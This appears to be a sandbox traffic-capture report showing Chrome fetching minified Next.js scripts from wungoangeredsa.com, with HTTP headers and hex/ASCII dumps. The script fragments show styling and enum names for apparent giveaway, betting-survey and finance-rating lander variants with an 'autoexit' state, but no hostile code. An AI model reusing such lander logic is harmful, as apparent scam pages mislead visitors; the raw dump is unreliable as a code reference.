                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-bcc3"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1054
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:21 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb4162fe741885-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:21 UTC873INData Raw: 37 64 63 31 0d 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 31 35 38 35 30 5d 2c 7b 36 33 37 35 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 65 2c 74 29 7b 74 2e 64 28 65 2c 7b 45 33 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 2c 65 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 7d 2c 69 4d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 75 7d 7d 29 3b 76 61 72 20 72 2c 69 3d 74 28 39 38 38 30 30 29 2c 61 3d 74 28 32 37 39 35 31 29 3b 21 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 6e 2e 51 55 45 53 54 49 4f 4e 53 3d 22 71 75 65 73 74 69 6f 6e 73 22 2c 6e 2e 50 52
                                                                                                          Data Ascii: 7dc1"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[15850],{6375:function(n,e,t){t.d(e,{E3:function(){return o},ed:function(){return r},iM:function(){return u}});var r,i=t(98800),a=t(27951);!function(n){n.QUESTIONS="questions",n.PR
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 29 2c 6c 3d 74 28 39 31 34 39 29 2c 66 3d 74 28 37 36 34 33 35 29 2c 49 3d 74 28 34 31 32 30 36 29 2c 70 3d 74 28 37 37 34 39 36 29 2c 41 3d 74 28 38 30 37 39 35 29 2c 4e 3d 74 28 39 38 38 30 30 29 2c 45 3d 74 28 32 31 38 31 38 29 2c 68 3d 74 28 31 31 31 33 33 29 2c 67 3d 74 28 39 37 38 39 37 29 2c 78 3d 74 28 32 39 37 35 34 29 2c 6d 3d 74 28 34 36 38 38 39 29 2c 76 3d 74 28 34 38 30 34 35 29 2c 43 3d 74 28 37 33 34 37 30 29 2c 5f 3d 74 28 31 39 34 39 35 29 2c 47 3d 74 28 39 35 37 39 38 29 2c 52 3d 74 28 32 37 39 38 29 2c 77 3d 74 28 36 30 38 31 35 29 2c 4c 3d 74 28 37 33 35 35 37 29 2c 54 3d 74 28 37 37 32 36 31 29 2c 53 3d 74 28 35 36 33 37 35 29 2c 42 3d 74 28 38 35 34 37 33 29 2c 62 3d 74 28 34 38 34 33 30 29 2c 46 3d 74 28 31 33 37 30 31 29 2c 79 3d
                                                                                                          Data Ascii: ),l=t(9149),f=t(76435),I=t(41206),p=t(77496),A=t(80795),N=t(98800),E=t(21818),h=t(11133),g=t(97897),x=t(29754),m=t(46889),v=t(48045),C=t(73470),_=t(19495),G=t(95798),R=t(2798),w=t(60815),L=t(73557),T=t(77261),S=t(56375),B=t(85473),b=t(48430),F=t(13701),y=
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 64 65 78 3a 20 34 3b 5c 6e 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 61 70 70 65 61 72 54 6f 6f 6c 74 69 70 20 30 2e 35 73 20 65 61 73 65 2d 6f 75 74 20 66 6f 72 77 61 72 64 73 3b 5c 6e 5c 6e 20 20 40 6b 65 79 66 72 61 6d 65 73 20 61 70 70 65 61 72 54 6f 6f 6c 74 69 70 20 7b 5c 6e 20 20 20 20 30 25 20 7b 5c 6e 20 20 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 5c 6e 20 20 20 20 7d 5c 6e 20 20 20 20 31 30 30 25 20 7b 5c 6e 20 20 20 20 20 20 6f 70 61 63 69 74 79 3a 20 31 3b 5c 6e 20 20 20 20 7d 5c 6e 20 20 7d 5c 6e 5c 6e 20 20 26 3a 61 66 74 65 72 20 7b 5c 6e 20 20 20 20 6c 65 66 74 3a 20 31 30 30 25 3b 5c 6e 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 5c 6e 20 20 20 20 62 6f 72 64 65 72 3a 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 5c 6e 20 20 20 20
                                                                                                          Data Ascii: dex: 4;\n animation: appearTooltip 0.5s ease-out forwards;\n\n @keyframes appearTooltip {\n 0% {\n opacity: 0;\n }\n 100% {\n opacity: 1;\n }\n }\n\n &:after {\n left: 100%;\n top: 50%;\n border: solid transparent;\n
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 22 3a 22 3f 22 2c 65 2b 3d 22 73 74 65 70 3d 22 2e 63 6f 6e 63 61 74 28 69 29 7d 28 30 2c 65 6e 2e 53 6a 29 28 7b 63 75 72 72 65 6e 74 54 61 62 55 72 6c 3a 65 2e 74 6f 53 74 72 69 6e 67 28 29 7d 29 7d 2c 72 6e 3d 22 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 6d 65 64 69 61 2f 62 6c 61 63 6b 2d 67 69 66 74 2e 35 30 36 30 35 61 36 31 2e 73 76 67 22 2c 61 6e 3d 33 36 2c 6f 6e 3d 33 36 2c 75 6e 3d 74 28 32 37 39 35 31 29 2c 63 6e 3d 74 28 32 38 36 35 29 2c 73 6e 3d 63 28 29 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 2e 65 28 36 32 32 32 31 29 2e 74 68 65 6e 28 74 2e 62 69 6e 64 28 74 2c 36 32 32 32 31 29 29 7d 29 2c 7b 6c 6f 61 64 61 62 6c 65 47 65 6e 65 72 61 74 65 64 3a 7b 77 65 62 70 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74
                                                                                                          Data Ascii: ":"?",e+="step=".concat(i)}(0,en.Sj)({currentTabUrl:e.toString()})},rn="/_next/static/media/black-gift.50605a61.svg",an=36,on=36,un=t(27951),cn=t(2865),sn=c()((function(){return t.e(62221).then(t.bind(t,62221))}),{loadableGenerated:{webpack:function(){ret
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 64 6c 65 50 65 72 63 65 6e 74 61 67 65 3a 22 31 38 25 22 2c 24 67 72 61 64 69 65 6e 74 45 6e 64 50 65 72 63 65 6e 74 61 67 65 3a 22 33 33 25 22 7d 29 7d 7d 29 2c 41 6e 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 65 2c 75 2c 63 2c 57 2c 4d 2c 5a 3d 6e 2e 63 6f 6e 66 69 67 2c 6b 3d 28 30 2c 5f 2e 62 70 29 28 29 2c 4f 3d 6b 2e 73 74 61 74 65 2c 56 3d 4f 2e 61 75 74 6f 65 78 69 74 2c 44 3d 4f 2e 75 73 65 72 44 61 74 61 2c 58 3d 6b 2e 64 69 73 70 61 74 63 68 2c 6a 3d 28 30 2c 54 2e 4d 29 28 29 2e 73 79 6e 63 4d 65 74 72 69 63 2c 71 3d 28 30 2c 73 2e 75 73 65 53 74 61 74 65 29 28 21 31 29 2c 4a 3d 71 5b 30 5d 2c 65 6e 3d 71 5b 31 5d 2c 41 6e 3d 28 30 2c 52 2e 64 29 28 7b 69 73 43 6f 6e 76 65 72 73 69 6f 6e 45 6e 61 62 6c 65 64 3a 6e 75 6c 6c 3d 3d 3d 5a
                                                                                                          Data Ascii: dlePercentage:"18%",$gradientEndPercentage:"33%"})}}),An=function(n){var e,u,c,W,M,Z=n.config,k=(0,_.bp)(),O=k.state,V=O.autoexit,D=O.userData,X=k.dispatch,j=(0,T.M)().syncMetric,q=(0,s.useState)(!1),J=q[0],en=q[1],An=(0,R.d)({isConversionEnabled:null===Z
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 6e 63 74 69 6f 6e 28 6e 29 7b 73 77 69 74 63 68 28 6e 29 7b 63 61 73 65 20 4e 2e 49 2e 4c 49 47 48 54 3a 63 61 73 65 20 4e 2e 49 2e 4d 4f 4e 45 59 3a 72 65 74 75 72 6e 22 23 30 30 30 22 3b 63 61 73 65 20 4e 2e 49 2e 44 41 52 4b 3a 64 65 66 61 75 6c 74 3a 72 65 74 75 72 6e 22 23 66 39 66 39 66 39 22 7d 7d 2c 61 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 73 77 69 74 63 68 28 6e 29 7b 63 61 73 65 20 4e 2e 49 2e 46 49 4e 41 4e 43 45 5f 52 41 54 49 4e 47 5f 47 52 45 45 4e 3a 72 65 74 75 72 6e 22 23 33 35 35 65 33 62 22 3b 63 61 73 65 20 4e 2e 49 2e 46 49 4e 41 4e 43 45 5f 52 41 54 49 4e 47 3a 64 65 66 61 75 6c 74 3a 72 65 74 75 72 6e 22 23 30 30 31 66 36 36 22 7d 7d 3b 72 65 74 75 72 6e 7b 63 6f 6d 6d 65 6e 74 73 3a 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 22 74 72 61
                                                                                                          Data Ascii: nction(n){switch(n){case N.I.LIGHT:case N.I.MONEY:return"#000";case N.I.DARK:default:return"#f9f9f9"}},a=function(n){switch(n){case N.I.FINANCE_RATING_GREEN:return"#355e3b";case N.I.FINANCE_RATING:default:return"#001f66"}};return{comments:{background:"tra
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 65 66 61 75 6c 74 3a 72 65 74 75 72 6e 22 23 34 37 34 37 34 37 22 7d 7d 28 6e 29 2c 70 61 64 64 69 6e 67 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 73 77 69 74 63 68 28 6e 29 7b 63 61 73 65 20 4e 2e 49 2e 4c 49 47 48 54 3a 63 61 73 65 20 4e 2e 49 2e 4d 4f 4e 45 59 3a 72 65 74 75 72 6e 22 30 20 38 70 78 20 38 70 78 22 3b 63 61 73 65 20 4e 2e 49 2e 44 41 52 4b 3a 64 65 66 61 75 6c 74 3a 72 65 74 75 72 6e 22 38 70 78 22 7d 7d 28 6e 29 2c 62 6f 72 64 65 72 52 61 64 69 75 73 3a 22 34 70 78 22 7d 2c 61 75 74 68 6f 72 4e 61 6d 65 3a 7b 63 6f 6c 6f 72 3a 65 28 6e 29 7d 2c 74 65 78 74 3a 7b 63 6f 6c 6f 72 3a 65 28 6e 29 7d 2c 64 61 74 65 3a 7b 66 6c 65 78 3a 22 31 22 7d 2c 63 6f 75 6e 74 3a 7b 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3a 22 74 72 61 6e 73 70 61 72
                                                                                                          Data Ascii: efault:return"#474747"}}(n),padding:function(n){switch(n){case N.I.LIGHT:case N.I.MONEY:return"0 8px 8px";case N.I.DARK:default:return"8px"}}(n),borderRadius:"4px"},authorName:{color:e(n)},text:{color:e(n)},date:{flex:"1"},count:{backgroundColor:"transpar
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 4e 41 4e 43 45 5f 52 41 54 49 4e 47 5f 47 52 45 45 4e 3a 72 65 74 75 72 6e 22 35 30 30 70 78 22 3b 64 65 66 61 75 6c 74 3a 72 65 74 75 72 6e 22 22 7d 7d 28 6e 29 2c 62 6f 72 64 65 72 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 3d 3d 3d 4e 2e 49 2e 42 4c 41 43 4b 5f 42 4c 55 45 3f 22 31 70 78 20 73 6f 6c 69 64 20 23 66 66 66 22 3a 22 22 7d 28 6e 29 2c 62 6f 72 64 65 72 52 61 64 69 75 73 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 3d 3d 3d 4e 2e 49 2e 42 4c 41 43 4b 5f 42 4c 55 45 3f 22 31 36 70 78 22 3a 22 22 7d 28 6e 29 7d 2c 63 6f 6e 74 61 69 6e 65 72 3a 7b 77 69 64 74 68 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 3d 3d 3d 4e 2e 49 2e 42 4c 41 43 4b 5f 42 4c 55 45 3f 22 22 3a 22 31 30 30 25 22 7d
                                                                                                          Data Ascii: NANCE_RATING_GREEN:return"500px";default:return""}}(n),border:function(n){return n===N.I.BLACK_BLUE?"1px solid #fff":""}(n),borderRadius:function(n){return n===N.I.BLACK_BLUE?"16px":""}(n)},container:{width:function(n){return n===N.I.BLACK_BLUE?"":"100%"}
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 4e 43 45 5f 52 41 54 49 4e 47 5f 47 52 45 45 4e 3a 72 65 74 75 72 6e 22 23 65 63 66 64 36 35 22 3b 63 61 73 65 20 4e 2e 49 2e 44 41 52 4b 3a 64 65 66 61 75 6c 74 3a 72 65 74 75 72 6e 22 23 66 66 66 22 7d 7d 28 6e 29 2c 74 65 78 74 41 6c 69 67 6e 3a 22 63 65 6e 74 65 72 22 7d 2c 74 69 74 6c 65 3a 7b 66 6f 6e 74 53 69 7a 65 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 73 77 69 74 63 68 28 6e 29 7b 63 61 73 65 20 4e 2e 49 2e 46 49 4e 41 4e 43 45 5f 52 41 54 49 4e 47 3a 63 61 73 65 20 4e 2e 49 2e 46 49 4e 41 4e 43 45 5f 52 41 54 49 4e 47 5f 47 52 45 45 4e 3a 72 65 74 75 72 6e 22 31 35 70 78 22 3b 63 61 73 65 20 4e 2e 49 2e 47 49 56 45 41 57 41 59 3a 72 65 74 75 72 6e 22 32 32 70 78 22 3b 63 61 73 65 20 4e 2e 49 2e 42 4c 41 43 4b 5f 42 4c 55 45 3a 72 65 74 75 72 6e
                                                                                                          Data Ascii: NCE_RATING_GREEN:return"#ecfd65";case N.I.DARK:default:return"#fff"}}(n),textAlign:"center"},title:{fontSize:function(n){switch(n){case N.I.FINANCE_RATING:case N.I.FINANCE_RATING_GREEN:return"15px";case N.I.GIVEAWAY:return"22px";case N.I.BLACK_BLUE:return
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 69 74 63 68 28 6e 29 7b 63 61 73 65 20 4e 2e 49 2e 46 49 4e 41 4e 43 45 5f 52 41 54 49 4e 47 3a 63 61 73 65 20 4e 2e 49 2e 46 49 4e 41 4e 43 45 5f 52 41 54 49 4e 47 5f 47 52 45 45 4e 3a 72 65 74 75 72 6e 22 34 30 30 70 78 22 3b 64 65 66 61 75 6c 74 3a 72 65 74 75 72 6e 22 22 7d 7d 28 6e 29 2c 67 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 3d 3d 3d 4e 2e 49 2e 42 4c 41 43 4b 5f 42 4c 55 45 3f 22 31 34 70 78 22 3a 22 22 7d 28 6e 29 2c 67 61 70 4d 65 64 69 61 34 38 30 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 73 77 69 74 63 68 28 6e 29 7b 63 61 73 65 20 4e 2e 49 2e 46 49 4e 41 4e 43 45 5f 52 41 54 49 4e 47 3a 63 61 73 65 20 4e 2e 49 2e 46 49 4e 41 4e 43 45 5f 52 41 54 49 4e 47 5f 47 52 45 45 4e 3a 72 65 74 75 72 6e 22 31 32 70 78 22 3b
                                                                                                          Data Ascii: itch(n){case N.I.FINANCE_RATING:case N.I.FINANCE_RATING_GREEN:return"400px";default:return""}}(n),gap:function(n){return n===N.I.BLACK_BLUE?"14px":""}(n),gapMedia480:function(n){switch(n){case N.I.FINANCE_RATING:case N.I.FINANCE_RATING_GREEN:return"12px";


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          41192.168.2.450086104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:21 UTC535OUTGET /_next/static/3ufPxZgwc9gMArDis_san/_buildManifest.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:09:21 UTC495INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:21 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-4e5"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1054
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:21 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb41631cf46a55-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:21 UTC874INData Raw: 34 65 35 0d 0a 73 65 6c 66 2e 5f 5f 42 55 49 4c 44 5f 4d 41 4e 49 46 45 53 54 3d 7b 5f 5f 72 65 77 72 69 74 65 73 3a 7b 62 65 66 6f 72 65 46 69 6c 65 73 3a 5b 5d 2c 61 66 74 65 72 46 69 6c 65 73 3a 5b 5d 2c 66 61 6c 6c 62 61 63 6b 3a 5b 5d 7d 2c 22 2f 22 3a 5b 22 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 34 30 37 64 61 38 33 35 39 38 65 61 32 32 33 35 2d 31 37 33 36 30 37 32 36 38 36 35 33 39 2d 31 33 32 38 38 65 61 30 39 34 33 32 32 30 38 38 2e 6a 73 22 5d 2c 22 2f 34 30 34 22 3a 5b 22 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 32 33 30 37 39 32 32 36 37 38 31 34 65 33 39 64 2d 31 37 33 36 30 37 32 36 38 36 35 33 39 2d 64 62 33 36 64 39 35 61 65 36 38 66 62 37 61 31 2e 6a 73 22 5d 2c 22 2f 5f 65 72 72 6f 72 22 3a 5b 22 73 74 61 74 69 63 2f 63 68 75 6e 6b
                                                                                                          Data Ascii: 4e5self.__BUILD_MANIFEST={__rewrites:{beforeFiles:[],afterFiles:[],fallback:[]},"/":["static/chunks/407da83598ea2235-1736072686539-13288ea094322088.js"],"/404":["static/chunks/230792267814e39d-1736072686539-db36d95ae68fb7a1.js"],"/_error":["static/chunk
                                                                                                          2025-01-06 11:09:21 UTC386INData Raw: 64 69 6e 67 4e 61 6d 65 5d 2f 5b 63 6f 6e 66 69 67 49 64 5d 2f 5b 5b 2e 2e 2e 73 6c 75 67 5d 5d 22 3a 5b 22 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 65 33 34 39 66 66 64 62 62 36 35 64 36 63 39 33 2d 31 37 33 36 30 37 32 36 38 36 35 33 39 2d 36 36 30 65 35 62 37 65 32 65 33 62 37 39 39 36 2e 6a 73 22 2c 22 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 66 31 31 61 34 63 30 33 32 34 37 31 38 33 31 66 2d 31 37 33 36 30 37 32 36 38 36 35 33 39 2d 64 66 36 62 38 34 32 66 32 31 38 33 38 36 33 62 2e 6a 73 22 5d 2c 73 6f 72 74 65 64 50 61 67 65 73 3a 5b 22 2f 22 2c 22 2f 34 30 34 22 2c 22 2f 5f 61 70 70 22 2c 22 2f 5f 65 72 72 6f 72 22 2c 22 2f 61 72 74 69 63 6c 65 2f 5b 69 64 5d 22 2c 22 2f 62 61 63 6b 22 2c 22 2f 63 6f 6f 6b 69 65 22 2c 22 2f 70 72 69 76 61 63 79
                                                                                                          Data Ascii: dingName]/[configId]/[[...slug]]":["static/chunks/e349ffdbb65d6c93-1736072686539-660e5b7e2e3b7996.js","static/chunks/f11a4c032471831f-1736072686539-df6b842f2183863b.js"],sortedPages:["/","/404","/_app","/_error","/article/[id]","/back","/cookie","/privacy
                                                                                                          2025-01-06 11:09:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          42192.168.2.450087104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:21 UTC412OUTGET /_next/static/chunks/2d343433e1c8b3ac-1736072686539.2dbd5874240e877f.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:09:21 UTC496INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:21 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-422e"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1054
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:21 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb41631ad10c8e-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:21 UTC873INData Raw: 34 32 32 65 0d 0a 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 38 32 30 33 2c 36 39 36 37 34 2c 34 32 32 35 31 2c 35 30 32 39 37 5d 2c 7b 34 38 30 34 35 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 64 28 65 2c 7b 68 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 7d 7d 29 3b 76 61 72 20 72 3d 74 28 31 32 31 33 39 29 2c 69 3d 74 28 32 39 37 35 34 29 3b 66 75 6e 63 74 69 6f 6e 20 61 28 6e 29 7b 76 61 72 20 65 3d 28 30 2c 72 2e 75 73 65 53 74 61 74 65 29 28 76 6f 69 64 20 30 29 2c 74 3d 65 5b 30 5d 2c 61 3d 65 5b 31 5d 2c 6f 3d 28 30 2c 72 2e 75 73 65 53 74 61 74 65 29 28
                                                                                                          Data Ascii: 422e(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8203,69674,42251,50297],{48045:function(n,e,t){"use strict";t.d(e,{h:function(){return a}});var r=t(12139),i=t(29754);function a(n){var e=(0,r.useState)(void 0),t=e[0],a=e[1],o=(0,r.useState)(
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 69 67 6e 22 2c 75 2e 74 6f 53 74 72 69 6e 67 28 29 29 2c 73 28 21 30 29 7d 61 28 75 29 7d 7d 29 2c 5b 63 5d 29 2c 28 30 2c 72 2e 75 73 65 45 66 66 65 63 74 29 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 73 28 21 31 29 7d 29 2c 5b 5d 29 2c 74 7d 7d 2c 37 33 34 37 30 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 64 28 65 2c 7b 59 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 7d 7d 29 3b 76 61 72 20 72 3d 74 28 36 36 33 38 33 29 2c 69 3d 74 28 31 32 31 33 39 29 2c 61 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 65 3d 28 30 2c 69 2e 75 73 65 53 74 61 74 65 29 28 21 31 29 2c 74 3d 65 5b 30 5d 2c 61 3d 65 5b 31 5d 2c 6f 3d 28 30 2c 69 2e 75 73 65 53 74 61 74 65 29 28 29 2c 63 3d 6f 5b 30 5d 2c 73
                                                                                                          Data Ascii: ign",u.toString()),s(!0)}a(u)}}),[c]),(0,r.useEffect)((function(){s(!1)}),[]),t}},73470:function(n,e,t){"use strict";t.d(e,{Y:function(){return a}});var r=t(66383),i=t(12139),a=function(n){var e=(0,i.useState)(!1),t=e[0],a=e[1],o=(0,i.useState)(),c=o[0],s
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 35 5d 3d 22 42 4c 41 43 4b 5f 52 45 44 22 2c 6e 5b 6e 2e 46 49 4e 41 4e 43 45 5f 52 41 54 49 4e 47 5f 47 52 45 45 4e 3d 36 5d 3d 22 46 49 4e 41 4e 43 45 5f 52 41 54 49 4e 47 5f 47 52 45 45 4e 22 2c 6e 5b 6e 2e 4d 4f 4e 45 59 3d 37 5d 3d 22 4d 4f 4e 45 59 22 2c 6e 5b 6e 2e 47 49 56 45 41 57 41 59 3d 38 5d 3d 22 47 49 56 45 41 57 41 59 22 2c 6e 5b 6e 2e 42 4c 41 43 4b 5f 42 4c 55 45 3d 39 5d 3d 22 42 4c 41 43 4b 5f 42 4c 55 45 22 7d 28 72 7c 7c 28 72 3d 7b 7d 29 29 7d 2c 32 37 39 35 31 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3b 74 2e 64 28 65 2c 7b 69 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 7d 7d 29 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 6e 2e 62 6c 61 63 6b 3d 22 62 6c 61
                                                                                                          Data Ascii: 5]="BLACK_RED",n[n.FINANCE_RATING_GREEN=6]="FINANCE_RATING_GREEN",n[n.MONEY=7]="MONEY",n[n.GIVEAWAY=8]="GIVEAWAY",n[n.BLACK_BLUE=9]="BLACK_BLUE"}(r||(r={}))},27951:function(n,e,t){"use strict";var r;t.d(e,{i:function(){return r}}),function(n){n.black="bla
                                                                                                          2025-01-06 11:09:21 UTC1369INData Raw: 3d 22 67 72 6f 63 65 72 79 53 74 6f 72 65 57 68 69 74 65 22 2c 6e 2e 62 65 74 74 69 6e 67 46 6f 6f 74 62 61 6c 6c 3d 22 62 65 74 74 69 6e 67 46 6f 6f 74 62 61 6c 6c 22 2c 6e 2e 6d 6f 62 69 6c 65 47 69 76 65 61 77 61 79 50 69 6e 6b 3d 22 6d 6f 62 69 6c 65 47 69 76 65 61 77 61 79 50 69 6e 6b 22 2c 6e 2e 6d 6f 62 69 6c 65 47 69 76 65 61 77 61 79 47 72 65 65 6e 3d 22 6d 6f 62 69 6c 65 47 69 76 65 61 77 61 79 47 72 65 65 6e 22 2c 6e 2e 66 69 6e 61 6e 63 65 47 69 76 65 61 77 61 79 3d 22 66 69 6e 61 6e 63 65 47 69 76 65 61 77 61 79 22 2c 6e 2e 62 65 74 74 69 6e 67 53 75 72 76 65 79 3d 22 62 65 74 74 69 6e 67 53 75 72 76 65 79 22 2c 6e 2e 67 72 65 65 6e 42 75 74 74 6f 6e 3d 22 67 72 65 65 6e 42 75 74 74 6f 6e 22 2c 6e 2e 64 61 74 69 6e 67 41 49 3d 22 64 61 74 69
                                                                                                          Data Ascii: ="groceryStoreWhite",n.bettingFootball="bettingFootball",n.mobileGiveawayPink="mobileGiveawayPink",n.mobileGiveawayGreen="mobileGiveawayGreen",n.financeGiveaway="financeGiveaway",n.bettingSurvey="bettingSurvey",n.greenButton="greenButton",n.datingAI="dati
